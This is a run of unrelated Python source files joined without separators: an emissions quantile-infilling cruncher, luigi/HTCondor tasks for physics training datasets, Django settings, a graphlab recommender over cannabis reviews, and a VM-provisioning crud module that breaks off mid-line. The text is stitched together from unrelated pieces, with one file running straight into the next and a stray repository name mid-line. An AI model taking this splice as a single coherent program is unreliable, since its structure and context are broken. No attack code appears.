- 0.5 \\times w where :math:`c_w` is the cumulative weights and :math:`w` is the raw weights. This ensures that quantiles less than half the weight of the smallest follow value return the smallest follow value and more than one minus half the weight of the largest follow value return the largest value. Without such a shift, the largest value is only returned if the quantile is 1, leading to a bias towards smaller values. With these calculations, we have determined the relationship between the follow timeseries values and the quantile i.e. cumulative sum of (normalised) weights. We can then determine arbitrary quantiles by linearly interpolating. If the option ``use_ratio`` is set to ``True``, instead of returning the absolute value of the follow at this quantile, we return the quantile of the ratio between the lead and follow data in the database, multiplied by the actual lead value of the database being infilled. By varying the quantile, this cruncher can provide ranges of the relationship between different variables. For example, it can provide the 90th percentile (i.e. high end) of the relationship between e.g. ``Emissions|CH4`` and ``Emissions|CO2`` or the 50th percentile (i.e. median) or any other arbitrary percentile/quantile choice. Note that the impact of this will strongly depend on nwindows and decay_length_factor. Using the :class:`TimeDepQuantileRollingWindows` class makes it is possible to specify a dictionary of dates to quantiles, in which case we return that quantile for that year or date. """ def derive_relationship( self, variable_follower, variable_leaders, quantile=0.5, nwindows=11, decay_length_factor=1, use_ratio=False, ): """ Derive the relationship between two variables from the database. Parameters ---------- variable_follower : str The variable for which we want to calculate timeseries (e.g. ``"Emissions|CH4"``). variable_leaders : list[str] The variable(s) we want to use in order to infer timeseries of ``variable_follower`` (e.g. ``["Emissions|CO2"]``). quantile : float The quantile to return in each window. nwindows : int The number of window centers to use when calculating the relationship between the follower and lead gases. decay_length_factor : float Parameter which controls how strongly points away from the window's centre should be weighted compared to points at the centre. Larger values give points further away increasingly less weight, smaller values give points further away increasingly more weight. use_ratio : bool If false, we use the quantile value of the weighted mean absolute value. If true, we find the quantile weighted mean ratio between lead and follow, then multiply the ratio by the input value. Returns ------- :obj:`func` Function which takes a :obj:`pyam.IamDataFrame` containing ``variable_leaders`` timeseries and returns timeseries for ``variable_follower`` based on the derived relationship between the two. Please see the source code for the exact definition (and docstring) of the returned function. Raises ------ ValueError There is no data for ``variable_leaders`` or ``variable_follower`` in the database. ValueError ``quantile`` is not between 0 and 1. ValueError ``nwindows`` is not equivalent to an integer or is not greater than 1. ValueError ``decay_length_factor`` is 0. """ self._check_follower_and_leader_in_db(variable_follower, variable_leaders) if not (0 <= quantile <= 1): error_msg = "Invalid quantile ({}), it must be in [0, 1]".format(quantile) raise ValueError(error_msg) if int(nwindows) != nwindows or nwindows < 2: error_msg = "Invalid nwindows ({}), it must be an integer > 1".format( nwindows ) raise ValueError(error_msg) nwindows = int(nwindows) if np.equal(decay_length_factor, 0): raise ValueError("decay_length_factor must not be zero") data_leader_unit = _get_unit_of_variable(self._db, variable_leaders)[0] data_follower_unit = _get_unit_of_variable(self._db, variable_follower)[0] db_time_col = self._db.time_col columns = "variable" idx = list(set(self._db.data.columns) - {columns, "value", "unit"}) wide_db = self._db.filter( variable=[variable_follower] + variable_leaders ).pivot_table(index=idx, columns=columns, aggfunc="sum") # make sure we don't have empty strings floating around (pyam bug?) wide_db = wide_db.applymap(lambda x: np.nan if isinstance(x, str) else x) wide_db = wide_db.dropna(axis=0) derived_relationships = {} for db_time, dbtdf in wide_db.groupby(db_time_col): xs = dbtdf[variable_leaders].values.squeeze() ys = dbtdf[variable_follower].values.squeeze() if xs.shape != ys.shape: raise NotImplementedError( "Having more than one `variable_leaders` is not yet implemented" ) if not xs.shape: # 0D-array, make 1D xs = np.array([xs]) ys = np.array([ys]) if use_ratio: # We want the ratio between x and y, not the actual values of y. ys = ys / xs if np.isnan(ys).any(): logger.warning( "Undefined values of ratio appear in the quantiles when " "infilling {}, setting some values to 0 (this may not affect " "results).".format(variable_follower) ) ys[np.isnan(ys)] = 0 if np.equal(max(xs), min(xs)): # We must prevent singularity behaviour if all the points are at the # same x value. cumsum_weights = np.array([(0.5 + x) / len(ys) for x in range(len(ys))]) ys.sort() def same_x_val_workaround( _, ys=ys, cumsum_weights=cumsum_weights, quantile=quantile ): if np.equal(min(ys), max(ys)): return ys[0] return scipy.interpolate.interp1d( cumsum_weights, ys, bounds_error=False, fill_value=(ys[0], ys[-1]), assume_sorted=True, )(quantile) derived_relationships[db_time] = same_x_val_workaround else: db_time_table = rolling_window_find_quantiles( xs, ys, quantile, nwindows, decay_length_factor ) derived_relationships[db_time] = scipy.interpolate.interp1d( db_time_table.index.values, db_time_table.loc[:, quantile].values.squeeze(), bounds_error=False, fill_value=( db_time_table[quantile].iloc[0], db_time_table[quantile].iloc[-1], ), ) def filler(in_iamdf): """ Filler function derived from :class:`QuantileRollingWindows`. Parameters ---------- in_iamdf : :obj:`pyam.IamDataFrame` Input data to fill data in Returns ------- :obj:`pyam.IamDataFrame` Filled in data (without original source data) Raises ------ ValueError The key db_times for filling are not in ``in_iamdf``. """ if db_time_col != in_iamdf.time_col: raise ValueError( "`in_iamdf` time column must be the same as the time column used " "to generate this filler function (`{}`)".format(db_time_col) ) var_units = _get_unit_of_variable(in_iamdf, variable_leaders) if var_units.size == 0: raise ValueError( "There is no data for {} so it cannot be infilled".format( variable_leaders ) ) var_units = var_units[0] if var_units != data_leader_unit: raise ValueError( "Units of lead variable is meant to be `{}`, found `{}`".format( data_leader_unit, var_units ) ) # check whether we have all the required timepoints or not have_all_timepoints = all( [c in derived_relationships for c in in_iamdf.timeseries()] ) if not have_all_timepoints: raise ValueError( "Not all required timepoints are present in the database we " "crunched, we crunched \n\t`{}`\nbut you passed in \n\t{}".format( list(derived_relationships.keys()), in_iamdf.timeseries().columns.tolist(), ) ) # do infilling here infilled_ts = in_iamdf.filter(variable=variable_leaders).timeseries() if use_ratio and (infilled_ts.values < 0).any(): warn_str = "Note that the lead variable {} goes negative.".format( variable_leaders ) logger.warning(warn_str) print(warn_str) for col in infilled_ts: if use_ratio: infilled_ts[col] = ( derived_relationships[col](infilled_ts[col]) * infilled_ts[col] ) else: infilled_ts[col] = derived_relationships[col](infilled_ts[col]) infilled_ts = infilled_ts.reset_index() infilled_ts["variable"] = variable_follower infilled_ts["unit"] = data_follower_unit return IamDataFrame(infilled_ts) return filler # coding: utf-8 # """ # Simple law tasks that demonstrate how use remote file targets and how to run on remote resources using HTCondor. # """ import os import luigi import law from shutil import rmtree from framework import Task, HTCondorWorkflow from tempfile import mkdtemp # law.contrib.load("tasks") # to have the RunOnceTask #Task runs over HTCondor class CreateTrainingDatasets(HTCondorWorkflow, law.LocalWorkflow): era = luigi.Parameter(description="Run era") channel = luigi.Parameter(description="Decay Channel") mass = luigi.Parameter(description="Mass hypothesis of heavy NMSSM Higgs boson.") batch_num = luigi.Parameter(description="Group of mass hypotheses of light NMSSM Higgs boson.") files_template = [ "{prefix}fold0_training_dataset.root", "{prefix}fold1_training_dataset.root", "{prefix}dataset_config.yaml", ] def create_branch_map(self): if self.era == "all_eras": eras = ["2016", "2017", "2018"] else: eras = [self.era] return [{"era": era, "channel": self.channel, "mass": self.mass, "batch": self.batch_num} for era in eras] def output(self): # Define output files: fold 0 and 1 of training data + config file prefix = "training_dataset_{era}_{channel}_{mass}_{batch}/".format( era=self.branch_data["era"], channel=self.channel, mass=self.mass, batch=self.batch_num ) files = [file_string.format(prefix=prefix) for file_string in self.files_template] targets = self.remote_targets(files) for target in targets: target.parent.touch() return targets def run(self): # Create training datasets self.run_command( command=[ "ml/create_training_dataset.sh", self.branch_data["era"], self.channel, self.mass, self.batch_num ], run_location="sm-htt-analysis" ) # Copy resulting files to remote storage prefix = "sm-htt-analysis/output/ml/{era}_{channel}_{mass}_{batch}/".format( era=self.branch_data["era"], channel=self.channel, mass=self.mass, batch=self.batch_num ) self.run_command( command=["ls", "-R"], run_location=prefix ) files = [file_string.format(prefix=prefix) for file_string in self.files_template] for file_remote, file_local in zip(self.output(), files): file_remote.copy_from_local(file_local) # Task runs local class CreateTrainingDatasetsAllEras(Task): era = luigi.Parameter(description="Run era") channel = luigi.Parameter(description="Decay Channel") mass = luigi.Parameter(description="Mass hypothesis of heavy NMSSM Higgs boson.") batch_num = luigi.Parameter(description="Group of mass hypotheses of light NMSSM Higgs boson.") # Requirements dependant on whether all_eras was used def requires(self): if self.era!="all_eras": raise Exception( "CreateTrainingDatasetsAllEras task is intended for all_eras, but {} was given.".format( self.era ) ) requirements_args = { "era": self.era, "channel": self.channel, "mass": self.mass, "batch_num": self.batch_num } return CreateTrainingDatasets(**requirements_args) def output(self): # Require combined config file prefix = "training_dataset_all_eras_{channel}_{mass}_{batch}/".format( channel=self.channel, mass=self.mass, batch=self.batch_num ) files = "{prefix}dataset_config.yaml".format(prefix=prefix) target = self.remote_target(files) target.parent.touch() return target def run(self): cmb_tag = "{channel}_{mass}_{batch}".format( channel=self.channel, mass=self.mass, batch=self.batch_num ) # If all_eras: if self.era == "all_eras": temporary_dir = mkdtemp(dir="/tmp/{user}".format(user=self.user_name)) # Fetch config files of all eras to local for i, era in enumerate(["2016", "2017", "2018"]): prefix_ = "{tmpdir}/{era}_{cmb_tag}/".format(tmpdir=temporary_dir, era=era, cmb_tag=cmb_tag) era_conf_file = self.input()["collection"][i][2] #dataset_config.yaml era_conf_file.copy_to_local("{prefix}dataset_config.yaml".format(prefix=prefix_)) # Combine configs command = ["ml/combine_configs.sh", self.channel, self.mass, self.batch_num, temporary_dir ] self.run_command(command=command, run_location="sm-htt-analysis") prefix = "{tmpdir}/all_eras_{cmb_tag}/".format(tmpdir=temporary_dir, cmb_tag=cmb_tag) # Send combined configs to remote self.output().touch() self.output().copy_from_local("{prefix}dataset_config.yaml".format(prefix=prefix))phiratio/lpthw10-100 class AverageList(list): @property def average(self): return sum(self) / len(self) import os from .core.internationalization import * from .core.applist import * from .core.json_settings import get_settings from .core.staticfiles import * from .core.mediafiles import * from .core.mailserver import * settings = get_settings() BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) SECRET_KEY = settings['SECRET_KEY'] DEBUG = settings['DEBUG'] ALLOWED_HOSTS = settings['SECURITY']['ALLOWED_HOSTS'] DATABASES = settings['DB'] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'djflow.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [os.path.join(BASE_DIR, 'djflow/templates')], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'djflow.wsgi.application' AUTH_PASSWORD_VALIDATORS = settings['AUTH_PASSWORD_VALIDATORS'] LOGIN_URL = '/security/login/' 0 import graphlab as gl from . import data_preprocess as dp from graphlab.toolkits.cross_validation import KFold from graphlab.toolkits.model_parameter_search import grid_search from . import nlp_funcs as nl from collections import Counter import pandas as pd from . import scrape_leafly as sl import matplotlib.pyplot as plt def basic_fr(train, test): ''' trains a default factorization_recommender on a train set and scores on test set args: train and test dataframes returns: graphlab recommendation engine ''' test_og = test.copy() ratings = gl.SFrame(train) testsl = gl.SFrame(test) rec_engine = gl.factorization_recommender.create(observation_data=ratings, user_id="user", item_id="product", target='rating', solver='auto', num_factors=32 # 32 by default ) test.rating = rec_engine.predict(testsl) test.to_csv('test_predictions.csv', index=False, encoding='utf-8') print('raw mse score:', dp.score_model_mse(test_og.rating, test.rating)) return rec_engine def gridsearch_big_step(df): ''' gridsearches num_factors for the factorization_recommender in larger steps args: dataframe, df returns: gridsearch object ''' data = gl.SFrame(df) kfolds = KFold(data, 3) params = dict([('user_id', 'user'), ('item_id', 'product'), ('target', 'rating'), ('solver', 'auto'), ('num_factors', [2, 3, 4, 5, 6, 10, 20, 32])]) grid = grid_search.create( kfolds, gl.factorization_recommender.create, params) grid.get_results() return grid # results: ''' +---------+-------------+--------+--------+---------+--------------+ | item_id | num_factors | solver | target | user_id | model_id | +---------+-------------+--------+--------+---------+--------------+ | product | 6 | auto | rating | user | [13, 12, 14] | | product | 2 | auto | rating | user | [1, 0, 2] | | product | 3 | auto | rating | user | [3, 5, 4] | | product | 4 | auto | rating | user | [8, 7, 6] | | product | 20 | auto | rating | user | [19, 18, 20] | | product | 32 | auto | rating | user | [21, 23, 22] | | product | 5 | auto | rating | user | [9, 11, 10] | | product | 10 | auto | rating | user | [15, 17, 16] | +---------+-------------+--------+--------+---------+--------------+ +----------------------+--------------------+------------------------+ | mean_validation_rmse | mean_training_rmse | mean_training_recall@5 | +----------------------+--------------------+------------------------+ | 1.00678522065 | 0.323030678029 | 0.000154761649416 | | 1.0208240936 | 0.453632730191 | 0.000122923478199 | | 1.00833928422 | 0.399805022552 | 0.000122507107597 | | 1.00770345896 | 0.362172915738 | 0.000107193018127 | | 0.983536655638 | 0.242915200506 | 0.00432907413023 | | 0.983353577078 | 0.24082851848 | 0.00435477863392 | | 1.00653732816 | 0.344224040089 | 0.000194937374462 | | 0.986200185618 | 0.272243232275 | 0.00193547952321 | +----------------------+--------------------+------------------------+ +--------------------------+-----------+-----------------------------+-----------+ | mean_validation_recall@5 | fold_id | mean_validation_precision@5 | num_folds | +--------------------------+-----------+-----------------------------+-----------+ | 2.22170382466e-06 | [1, 0, 2] | 2.22170382466e-06 | 3 | | 0.0 | [1, 0, 2] | 0.0 | 3 | | 0.0 | [0, 2, 1] | 0.0 | 3 | | 0.0 | [2, 1, 0] | 0.0 | 3 | | 2.55287233685e-05 | [1, 0, 2] | 5.10991879673e-05 | 3 | | 3.18371310973e-05 | [0, 2, 1] | 3.77689650193e-05 | 3 | | 0.0 | [0, 2, 1] | 0.0 | 3 | | 1.58848655361e-05 | [0, 2, 1] | 1.55519267726e-05 | 3 | +--------------------------+-----------+-----------------------------+-----------+ +---------------------------+ | mean_training_precision@5 | +---------------------------+ | 0.000139302381458 | | 0.0001082603732 | | 0.000133943316761 | | 0.000108451292331 | | 0.00392953856325 | | 0.00397506409151 | | 0.0001511569914 | | 0.00165102804133 | +---------------------------+ ''' ''' looks like 20 features is a decent number. need to gridsearch more later in the range 10-30 ''' def gridsearch_alot(df): ''' gridsearches num_factors for the factorization_recommender in range 2-32 args: dataframe, df returns: gridsearch object ''' data = gl.SFrame(df) kfolds = KFold(data, 3) num_factors_space = list(range(20, 31)) num_factors_space.extend([2, 4, 6, 8, 10, 12, 16, 32]) num_factors_space = sorted(num_factors_space) params = dict([('user_id', 'user'), ('item_id', 'product'), ('target', 'rating'), ('solver', 'auto'), ('num_factors', num_factors_space)]) grid = grid_search.create( kfolds, gl.factorization_recommender.create, params) grid.get_results() return grid if __name__ == "__main__": df = dp.load_data() df.drop(['date', 'time', 'review'], axis=1, inplace=True) df2 = dp.get_users_more_than_2_reviews(df) # # drop everything but user, product, rating grid2 = gridsearch_alot(df2) res2 = grid2.get_results() grid2.save('gridsearch_gt2_reviews.sframe') res2df = res2.to_dataframe() # converts to pandas dataframe res2df = res2df.sort_values(by='num_factors') res2df.to_csv('res2df.csv') res2df.plot(x='num_factors', y='mean_validation_rmse') plt.show() res2df.plot(x='num_factors', y='mean_training_rmse') plt.show() res2df.plot(x='num_factors', y='mean_training_recall@5') plt.show() res2df.plot(x='num_factors', y='mean_validation_recall@5') plt.show() res2df.plot(x='num_factors', y='mean_validation_precision@5') plt.show() res2df.plot(x='num_factors', y='mean_training_precision@5') plt.show() # looks like at about 10 factors, things flatten out # print grid.get_results() # remove user 'Anonymous' -- necessary to match up size of products from # data_preprocess get users and products func # basic rec engine first try #train, test = dp.make_tt_split(df) # trains and scores a basic factorization_recommender #basic_fr(train, test) # gridsearches over larger steps # gridsearch_big_step(df) # fit a model to the full review set to get latent feature groups # data = gl.SFrame(df) # num_factors = 20 # rec_engine = gl.factorization_recommender.create(observation_data=data, # user_id="user", # item_id="product", # target='rating', # solver='auto', # num_factors=num_factors # ) # # # assign groups to users and products based on highest coefficient in the matrices # d = rec_engine.get("coefficients") # U1 = d['user'] # U2 = d['product'] # U1 = U1['factors'].to_numpy() # U2 = U2['factors'].to_numpy() # # user_groups = U1.argmax(axis=1) # prod_groups = U2.argmax(axis=1) # # users, products = dp.get_users_and_products(df) # # full_df = dp.load_data() # prod_group_dict = {} # prod_group_dfs = {} # for i in range(num_factors): # # this gets the product names in each group # prod_list = products[prod_groups == i].index # prod_group_dict[i] = prod_list # prod_list = set(prod_list) # # this will get dataframes from the main df with products in each group # prod_group_dfs[i] = full_df[full_df['product'].isin(prod_list)] # # top_words = {} # top_words_set = set() # word_list = [] # for i in range(num_factors): # words = nl.get_top_words(prod_group_dfs[i]) # top_words_set = top_words_set | set(words) # top_words[i] = words # word_list.extend(words) # # word_counter = Counter(word_list) # # # try lemmatization # top_words = {} # top_words_set = set() # word_list = [] # for i in range(num_factors): # words = nl.get_top_words_lemmatize(prod_group_dfs[i], 50) # top_words_set = top_words_set | set(words) # top_words[i] = words # word_list.extend(words) # # word_counter = Counter(word_list) ''' gave this: ({u'also': 19, u'always': 1, u'anxiety': 20, u'atf': 1, u'awesome': 19, u'back': 2, u'beautiful': 1, u'bit': 1, u'blackberry': 1, u'blueberry': 1, u'body': 20, u'bubba': 1, u'bud': 20, u'buzz': 19, u'cheese': 2, u'chemdawg': 1, u'couch': 10, u'crack': 1, u'day': 20, u'definitely': 20, u'diesel': 1, u'earthy': 2, u'effect': 20, u'energetic': 3, u'energy': 1, u'euphoric': 13, u'ever': 20, u'far': 1, u'feel': 20, u'feeling': 20, u'felt': 14, u'first': 20, u'flavor': 20, u'fruity': 1, u'gdp': 1, u'get': 20, u'give': 18, u'go': 19, u'got': 20, u'green': 1, u'gsc': 1, u'ha': 20, u'haze': 2, u'headband': 1, u'heavy': 14, u'help': 7, u'hit': 20, u'hybrid': 1, u'indica': 20, u'insomnia': 1, u'jack': 1, u'kush': 8, u'lemon': 4, u'little': 19, u'long': 20, u'made': 19, u'make': 20, u'mellow': 14, u'much': 20, u'night': 15, u'og': 3, u'one': 20, u'orange': 1, u'perfect': 20, u'pineapple': 1, u'potent': 8, u'pretty': 20, u'purple': 2, u'recommend': 20, u'relaxed': 20, u'relief': 5, u'right': 2, u'sativa': 20, u'shit': 6, u'smoked': 20, u'smoking': 18, u'smooth': 20, u'still': 8, u'stress': 2, u'stuff': 20, u'super': 20, u'tasty': 1, u'top': 5, u'uplifting': 15, u'wa': 20, u'weed': 19, u'well': 20, u'white': 1, u'widow': 1, u'would': 20}) words to use for feeling: uplifting, mellow, euphoric, euphoria, energy, energetic, relief words to use for taste: potent, pineapple, orange, lemon, earthy, diesel, blackberry, blueberry, cherry, banana words to use for conditions: insomnia, stress, headache, depression, anxiety words to use for effects: body, couch, mellow, focus, focused, cerebral times: daytime, night words to include in stoplist: weed, wa, well, white, widow, would, tasty, top, stuff, super, still, smooth, smoked, smoking, shit, sativa, right, relaxed, recommend, purple, pretty, og, one, perfect, far, feel, feeling, first, flavor, long, made, make, mellow, much, night, little, kush, jack, indica, hybrid, hit, help, heavy, headband, haze, ha, gsc, green, got, go, give, get, gdp, ever, always, atf, awesome, beautiful, bit, bubba, bud, buzz, chemdawg, crack, definitely, effect ''' # try bigrams # top_words = {} # top_words_set = set() # word_list = [] # for i in range(num_factors): # words = nl.get_top_bigrams(prod_group_dfs[i]) # top_words_set = top_words_set | set(words) # top_words[i] = words # word_list.extend(words) # # word_counter = Counter(word_list) # # # get strain list so we can exclude it from bigrams # strains = sl.load_current_strains(correct_names=True) # strains_split = [s.split('/') for s in strains] # strain_info = [(s[1].lower(), s[2].lower(), re.sub('-', ' ', s[2].lower())) for s in strains_split] # # maps strain to category (hybrid, indica, sativa, edible) in each group # strain_cat_dict = {} # for s in strain_info: # strain_cat_dict[s[1]] = s[0] # # # get % of each type (hybrid, indica, sativa, edible) in each group # prod_group_pcts = {} # for p in prod_group_dfs: # temp_df = prod_group_dfs[p] # temp_df['category'] = temp_df['product'].map(lambda x: strain_cat_dict[x]) # prod_group_dfs[p] = temp_df # cat_val_counts_p = prod_group_dfs[p]['category'].value_counts() # prod_group_pcts[p] = [round(float(c)/prod_group_dfs[p].shape[0]*100, 2) for c in cat_val_counts_p] # prod_group_pcts[p] = pd.Series(data=prod_group_pcts[p], index=cat_val_counts_p.index) # # # # get % of each type overall # full_df['category'] = full_df['product'].map(lambda x: strain_cat_dict[x]) # cat_val_counts = full_df['category'].value_counts() # print cat_val_counts # cat_val_pct = [round(float(c)/full_df.shape[0]*100, 2) for c in cat_val_counts] # cat_val_pct = pd.Series(data=cat_val_pct, index=cat_val_counts.index) # # print top_words_set # without any stopwords: [u'good', u'pain', # u'taste', u'high', u'strain', u'love', u'best', u'really', u'great', # u'like', u'favorite', u'smoke', u'time', u'smell', u'nice'] #crud.py from typing import List from sqlalchemy.orm import Session from exceptions import ComponentInfoAlreadyExistError, ComponentInfoNotFoundError, NoComponentsSelected from models import componentsInfo, usersInfo from schemas import CreateAndUpdateComponent, Creation import vagrant import os import boto3 import json import virtualbox import subprocess import enum import time class machineStates(enum.Enum): #for VB states Null = 0 PoweredOff = 1 Saved = 2 Teleported = 3 Aborted = 4 Running = 5 Paused = 6 Stuck = 7 Teleporting = 8 LiveSnapshotting = 9 Starting = 10 Stopping = 11 Saving = 12 Restoring = 13 # Function to get list of components info def get_all_components(session: Session, _username: str) -> List[componentsInfo]: component_info = session.query(componentsInfo).filter_by(username=_username).all() if component_info is None: raise ComponentInfoNotFoundError return component_info # Function to get info of a particular component def get_component_info_by_component_id(session: Session, _username: str, _componentname: str) -> componentsInfo: component_info = session.query(componentsInfo).filter_by(username=_username, hostname=_componentname).first() #component_info = session.query(componentsInfo).get(_componentname) if component_info is None: raise ComponentInfoNotFoundError return component_info # Function to add a new component info to the database def create_component(session: Session, _username: str, components: Creation) -> componentsInfo: # Check for no component selected if components.dashboard == False and components.webpage == False and components.challenge == False and components.monitoring == False: raise NoComponentsSelected # Check if the names given have duplicates are not and if the names are in the database or not if yes go error, no then cont. if components.dashboard == True: if components.dashboard_name == components.webpage_name or components.dashboard_name == components.challenge_name or components.dashboard_name == components.monitoring_name: raise ComponentInfoAlreadyExistError component_details = session.query(componentsInfo).filter( componentsInfo.hostname == components.dashboard_name, componentsInfo.username == _username).first() if component_details is not None: raise ComponentInfoAlreadyExistError if components.webpage == True: if components.webpage_name == components.challenge_name or components.webpage_name == components.monitoring_name: raise ComponentInfoAlreadyExistError component_details = session.query(componentsInfo).filter( componentsInfo.hostname == components.webpage_name, componentsInfo.username == _username).first() if component_details is not None: raise ComponentInfoAlreadyExistError if components.challenge == True: if components.challenge_name == components.monitoring_name: raise ComponentInfoAlreadyExistError component_details = session.query(componentsInfo).filter( componentsInfo.hostname == components.challenge_name, componentsInfo.username == _username).first() if component_details is not None: raise ComponentInfoAlreadyExistError if components.monitoring == True: component_details = session.query(componentsInfo).filter( componentsInfo.hostname == components.monitoring_name, componentsInfo.username == _username).first() if component_details is not None: raise ComponentInfoAlreadyExistError # Create the json file for vagrantfile jsconfig = [ { "provision": components.dashboard, "hostname": components.dashboard_name, "resource": components.dashboard_resource, "type": "dashboard" }, { "provision": components.webpage, "hostname": components.webpage_name, "resource": components.webpage_resource, "type": "webpage" }, { "provision": components.challenge, "hostname": components.challenge_name, "resource": components.challenge_resource, "type": "challenge" }, { "provision": components.monitoring, "hostname": components.monitoring_name, "resource": components.monitoring_resource, "type": "monitoring" } ] # Serializing json json_object = json.dumps(jsconfig, indent = 4) # Writing to sample.json with open("sample.json", "w") as outfile: outfile.write(json_object) # Vagrant up to create the machines vagrantfilepath = os.path.join("config") v = vagrant.Vagrant(vagrantfilepath, quiet_stdout=False) v.up() # For creating an vb instance based on vagrantfile # Connect to EC2 ec2 = boto3.resource('ec2') # Connect to vbox vbox = virtualbox.VirtualBox() # Get info into the database for each component accepted if components.dashboard == True and components.dashboard_resource == "virtualbox": # Get the machine to receive the machine state and machine IPv4 and OS vm = vbox.find_machine(components.dashboard_name) dashboard_state = machineStates(vm.state).name time.sleep(30) dashboard_box = subprocess.run(["VBoxManage", "guestproperty", "get", components.dashboard_name, "/VirtualBox/HostInfo/VBoxVerExt"], capture_output=True, text=True).stdout dashboard_ip = subprocess.run(["VBoxManage", "guestproperty", "get", components.dashboard_name, "/VirtualBox/GuestInfo/Net/1/V4/IP"], capture_output=True, text=True).stdout dashboard_box = dashboard_box.split() dashboard_ip = dashboard_ip.split() dashboard_box = dashboard_box[1] dashboard_ip = dashboard_ip[1] #add the component into the database new_component_info = componentsInfo(username = _username, type = "dashboard", resource = components.dashboard_resource, hostname = components.dashboard_name, URL_access = dashboard_ip, state = dashboard_state) session.add(new_component_info) session.commit() session.refresh(new_component_info) elif components.dashboard == True and components.dashboard_resource == "aws": # Get the machine to receive the machine state and machine IPv4 and OS # Get information for specfic instance current_instances = ec2.instances.filter(Filters=[ {"Name": "tag:Name", "Values":[components.dashboard_name]}]) for instance in current_instances: for tag in instance.tags: if 'Name'in tag['Key']: name = tag['Value'] # Get the instance data dashboard_ip = instance.public_ip_address dashboard_storage = instance.instance_type dashboard_box = instance.platform_details dashboard_state = instance.state['Name'] #add the component into the database new_component_info = componentsInfo(username = _username, type = "dashboard", resource = components.dashboard_resource, hostname = components.dashboard_name, URL_access = dashboard_ip, state = dashboard_state) session.add(new_component_info) session.commit() session.refresh(new_component_info) if components.webpage == True and components.webpage_resource == "virtualbox": # Get the machine to receive the machine state and machine IPv4 and OS vm = vbox.find_machine(components.webpage_name) webpage_state = machineStates(vm.state).name time.sleep(30) webpage_box = subprocess.run(["VBoxManage", "guestproperty", "get", components.webpage_name, "/VirtualBox/HostInfo/VBoxVerExt"], capture_output=True, text=True).stdout webpage_ip = subprocess.run(["VBoxManage", "guestproperty", "get", components.webpage_name, "/VirtualBox/GuestInfo/Net/1/V4/IP"], capture_output=True, text=True).stdout webpage_box = webpage_box.split() webpage_ip = webpage_ip.split() webpage_box = webpage_box[1] webpage_ip = webpage_ip[1] #add the component into the database new_component_info = componentsInfo(username = _username, type = "webpage", resource = components.webpage_resource, hostname = components.webpage_name, URL_access = webpage_ip, state = webpage_state) session.add(new_component_info) session.commit() session.refresh(new_component_info) elif components.webpage == True and components.webpage_resource == "aws": # Get the machine to receive the machine state and machine IPv4 and OS # Get information for specfic instance current_instances = ec2.instances.filter(Filters=[ {"Name": "tag:Name", "Values":[components.webpage_name]}]) for instance in current_instances: for tag in instance.tags: if 'Name'in tag['Key']: name = tag['Value'] # Get the instance data webpage_ip = instance.public_ip_address webpage_storage = instance.instance_type webpage_box = instance.platform_details webpage_state = instance.state['Name'] #add the component into the database new_component_info = componentsInfo(username = _username, type = "webpage", resource = components.webpage_resource, hostname = components.webpage_name, URL_access = webpage_ip, state = webpage_state) session.add(new_component_info) session.commit() session.refresh(new_component_info) if components.challenge == True and components.challenge_resource == "virtualbox": # Get the machine to receive the machine state and machine IPv4 and OS vm = vbox.find_machine(components.challenge_name) challenge_state = machineStates(vm.state).name time.sleep(30) challenge_box = subprocess.run(["VBoxManage", "guestproperty", "get", components.challenge_name, "/VirtualBox/HostInfo/VBoxVerExt"], capture_output=True, text=True).stdout challenge_ip = subprocess.run(["VBoxManage", "guestproperty", "get", components.challenge_name, "/VirtualBox/GuestInfo/Net/1/V4/IP"], capture_output=True, text=True).stdout challenge_box = challenge_box.split() challenge_ip = challenge_ip.split() challenge_box = challenge_box[1] challenge_ip = challenge_ip[1] #add the component into the database new_component_info = componentsInfo(username = _username, type = "challenge", resource = components.challenge_resource, hostname = components.challenge_name, URL_access = challenge_ip, state = challenge_state) session.add(new_component_info) session.commit() session.refresh(new_component_info) elif components.challenge == True and components.challenge_resource == "aws": # Get the machine to receive the machine state and machine IPv4 and OS # Get information for specfic instance current_instances = ec2.instances.filter(Filters=[ {"Name": "tag:Name", "Values":[components.challenge_name]}]) for instance in current_instances: for tag in instance.tags: if 'Name'in tag['Key']: name = tag['Value'] # Get the instance data challenge_ip = instance.public_ip_address challenge_storage = instance.instance_type challenge_box = instance.platform_details challenge_state = instance.state['Name'] #add the component into the database new_component_info = componentsInfo(username = _username, type = "challenge", resource = components.challenge_resource, hostname = components.challenge_name, URL_access = challenge_ip, state = challenge_state) session.add(new_component_info) session.commit() session.refresh(new_component_info) if components.monitoring == True and components.monitoring_resource == "virtualbox": # Get the machine to receive the machine state and machine IPv4 and OS vm = vbox.find_machine(components.monitoring_name) monitoring_state = machineStates(vm.state).name time.sleep(30) monitoring_box = subprocess.run(["VBoxManage", "guestproperty", "get", components.monitoring_name, "/VirtualBox/HostInfo/VBoxVerExt"], capture_output=True, text=True).stdout monitoring_ip = subprocess.run(["VBoxManage", "guestproperty", "get", components.monitoring_name, "/VirtualBox/GuestInfo/Net/1/V4/IP"], capture_output=True, text=True).stdout monitoring_box = monitoring_box.split() monitoring_ip = monitoring_ip.split() monitoring_box = monitoring_box[1] monitoring_ip = monitoring_ip[1] #add the component into the database new_component_info = componentsInfo(username = _username, type = "monitoring", resource = components.monitoring_resource, hostname = components.monitoring_name, URL_access = monitoring_ip, state = monitoring_state) session.add(new_component_info) session.commit() session.refresh(new_component_info) elif components.monitoring == True and components.monitoring_resource == "aws": # Get the machine to receive the machine state and machine IPv4 and OS # Get information for specfic instance current_instances = ec2.instances.filter(Filters=[ {"Name": "tag:Name", "Values":[components.monitoring_name]}]) for instance in current_instances: for tag in instance.tags: if 'Name'in tag['Key']: name = tag['Value'] # Get the instance data monitoring_ip = instance.public_ip_address monitoring_storage = instance.instance_type monitoring_box = instance.platform_details monitoring_state = instance.state['Name'] #add the component into the database new_component_info = componentsInfo(username = _username, type = "monitoring", resource = components.monitoring_resource, hostname = 